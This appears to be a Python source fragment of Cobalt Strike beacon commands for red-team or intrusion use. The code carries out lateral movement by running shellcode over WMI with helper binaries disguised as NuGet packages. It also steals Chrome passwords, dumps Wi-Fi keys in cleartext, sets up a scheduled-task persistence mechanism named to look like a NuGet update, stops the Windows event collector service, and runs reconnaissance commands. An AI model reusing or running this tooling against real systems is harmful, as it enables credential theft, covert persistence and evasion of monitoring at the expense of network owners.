def lateral_wmi_shellcode(bid, host, shellcode, user=None, password=None):
native_helper = utils.basedir('tools/native.exe')
temp_relative = 'WINDOWS'
temp_remote = r'\\{}\C$\{}'.format(host, temp_relative)
temp_local = r'C:\{}'.format(temp_relative)
native_helper_relative = 'NugetPackage.{}.exe'.format(helpers.randstr())
native_helper_remote = r'{}\{}'.format(temp_remote, native_helper_relative)
native_helper_local = r'{}\{}'.format(temp_local, native_helper_relative)
shellcode_relative = r'nuget.{}.package'.format(helpers.randstr())
shellcode_remote = r'{}\{}'.format(temp_remote, shellcode_relative)
shellcode_local = r'{}\{}'.format(temp_local, shellcode_relative)
# upload
helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
# call it
remote_command = '{} {}'.format(native_helper_local, shellcode_local)
# TODO user/pass
local_command = 'echo "{host}" & wmic /node:"{host}" '.format(host=host)
if user or password:
local_command += ' /user:{user} /password:{password} '.format(user=user, password=password)
local_command += 'process call create "{command}","{cwd}"'.format(host=host, command=remote_command, cwd=temp_local)
aggressor.bshell(bid, local_command)
def _(bid, *files):
if not files:
aggressor.berror('cat: specify some files to cat')
return
command = '\n'.join(['type {}'.format(f) for f in files])
aggressor.bshell(bid, command)
def _(bid):
#temp = r'{}\AppData\Local'.format(helpers.guess_home(bid))
temp = r'{}'.format(helpers.guess_home(bid))
out_file = r'{}\c'.format(temp)
dest = r'{}\temp.exe'.format(temp)
helpers.upload_to(bid, utils.basedir('tools/chrome-passwords.exe'), dest)
aggressor.bshell(
bid,
r'{} > {} & echo "Chrome credentials ready at {}. Run grab-chrome-next"'
.format(cmd_quote(dest), cmd_quote(out_file), out_file))
def _(bid, profile=None):
if profile:
command = helpers.code_string("""
netsh wlan export profile name="{name}" folder=$env:temp key=clear
$profile = $env:temp:\*{name}*.xml
get-content $profile
rm $profile
""".format(name=profile))
aggressor.bpowerpick(bid, command)
else:
aggressor.bshell(bid, 'netsh wlan show profiles name="*" key=clear');
def _(bid, shellcode):
local_helper = utils.basedir('tools/native_persist.exe')
appdata = helpers.guess_appdata(bid)
nuget_dir = r'{}\NuGet'.format(appdata)
remote_helper = r'{}\NugetManager.exe'.format(nuget_dir)
aggressor.bmkdir(bid, nuget_dir)
helpers.upload_to(bid, shellcode, r'{}\nuget.package'.format(nuget_dir))
helpers.upload_to(bid, local_helper, remote_helper)
aggressor.bshell(
bid, 'schtasks /create /f /tn NugetUpdate /sc daily /tr {}'.format(
remote_helper))
def _(bid):
aggressor.bshell(bid, 'nslookup myip.opendns.com. resolver1.opendns.com')
def _(bid):
aggressor.bshell(bid, 'wmic product get Name,Version,Description')
def _(bid, *args):
command = ' '.join(args)
aggressor.bshell(bid, command)
def _(bid):
aggressor.bshell(bid, 'echo pong')
def _(bid, host):
aggressor.bshell(bid, 'nslookup "{}"'.format(host))
def _(bid):
aggressor.btask(bid, 'Tasked beacon to get WANIP via DNS')
aggressor.bshell(bid,
'nslookup myip.opendns.com. resolver1.opendns.com',
silent=True)
def _(bid):
aggressor.btask(bid, 'Tasked beacon to get list of applications')
aggressor.bshell(bid,
'wmic product get Name,Version,Description',
silent=True)
def finish(text):
for bid in bids:
aggressor.bshell(bid, text)
def _(bid):
aggressor.bshell(bid, "sc stop wecsvc")